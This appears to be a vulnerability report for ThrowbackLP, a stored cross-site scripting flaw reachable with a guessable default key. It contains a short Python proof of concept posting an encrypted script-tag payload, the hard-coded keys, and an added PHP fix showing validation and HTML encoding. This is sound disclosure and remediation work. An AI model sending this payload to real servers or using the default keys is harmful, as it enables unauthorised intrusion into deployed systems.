Open
Description
An attacker who is able to guess (or RE) the key (default: 123spec!alk3y456) will be able to introduce data that will be added, unsanitized, into the database. This data may be outputted to the user leading to persistent cross-site scripting.
POC
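```python
import requests

# encrypt(), host and port are not defined in the report; they are left as referenced.
key = "123spec!alk3y456"
t = encrypt("enc="+key+"&hn=\"><script>alert(1);</script>&id=2&vn=0.1", "ZAQwsxcde321")
payload = {'pd':t}
r = requests.post("http://" + host + ":" + port + "//throwbackLP//index.php" , data=payload)
```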
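
Server-side handling of the `hn`, `id` and `vn` fields that closes the stored-XSS path described in this report, as an added example (not ThrowbackLP's code and not part of the original issue). The field formats and the helper names `validate_callback` and `h` are assumptions.

```php
<?php
// Added example, not ThrowbackLP code. Field formats below are assumptions.

/**
 * Validate the decrypted callback fields before they are stored.
 * Returns the cleaned fields, or null if any field is malformed.
 */
function validate_callback(array $f): ?array
{
    $hn = $f['hn'] ?? '';
    $id = $f['id'] ?? '';
    $vn = $f['vn'] ?? '';

    // Assumed: hn is a host name (letters, digits, dot, dash, underscore).
    if (!is_string($hn) || !preg_match('/\A[A-Za-z0-9._-]{1,63}\z/', $hn)) {
        return null;
    }
    // Assumed: id is a non-negative integer.
    if (!is_string($id) || !preg_match('/\A\d{1,9}\z/', $id)) {
        return null;
    }
    // Assumed: vn is a dotted version string such as 0.1.
    if (!is_string($vn) || !preg_match('/\A\d{1,4}(\.\d{1,4}){0,3}\z/', $vn)) {
        return null;
    }
    return ['hn' => $hn, 'id' => (int) $id, 'vn' => $vn];
}

/** Encode a stored value for HTML text or a quoted attribute value. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample: the field string from the PoC, as it looks after decryption.
parse_str('hn="><script>alert(1);</script>&id=2&vn=0.1', $fields);

// Input side: the malformed hn makes the whole callback invalid, so nothing is stored.
$clean = validate_callback($fields);
echo $clean === null ? "callback rejected\n" : "callback accepted\n";

// Output side: rows stored before the fix are still rendered as inert text.
echo '<td>' . h($fields['hn']) . "</td>\n";
```

Output encoding is the control that stops the script from executing; the input validation only narrows what can reach the database if the key is known.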